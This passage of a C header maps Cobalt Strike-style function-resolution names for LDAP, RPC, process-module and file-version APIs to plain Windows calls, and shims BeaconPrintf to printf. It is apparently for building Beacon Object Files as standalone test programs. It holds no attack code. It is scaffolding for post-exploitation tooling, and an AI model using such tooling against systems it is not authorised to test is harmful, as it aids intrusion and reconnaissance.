#define WLDAP32$ldap_memfree            ldap_memfree
#define WLDAP32$ldap_unbind             ldap_unbind
#define WLDAP32$ldap_unbind_s           ldap_unbind_s
#define WLDAP32$ldap_msgfree            ldap_msgfree

// RPCRT4
#define RPCRT4$UuidToStringA            UuidToStringA
#define RPCRT4$RpcStringFreeA           RpcStringFreeA

// PSAPI
#define PSAPI$EnumProcessModulesEx      EnumProcessModulesEx
#define PSAPI$GetModuleFileNameExA      GetModuleFileNameExA

// VERSION
#define VERSION$GetFileVersionInfoSizeA GetFileVersionInfoSizeA
#define VERSION$GetFileVersionInfoA     GetFileVersionInfoA
#define VERSION$VerQueryValueA          VerQueryValueA

// Output shims for this branch: BeaconPrintf discards its first argument and
// forwards the format string and remaining arguments to printf
// (##__VA_ARGS__ is a GNU extension); internal_printf is printf itself.
#define BeaconPrintf(x, y, ...) printf(y, ##__VA_ARGS__)
#define internal_printf printf
#endif
--------------------------------------------------------------------------------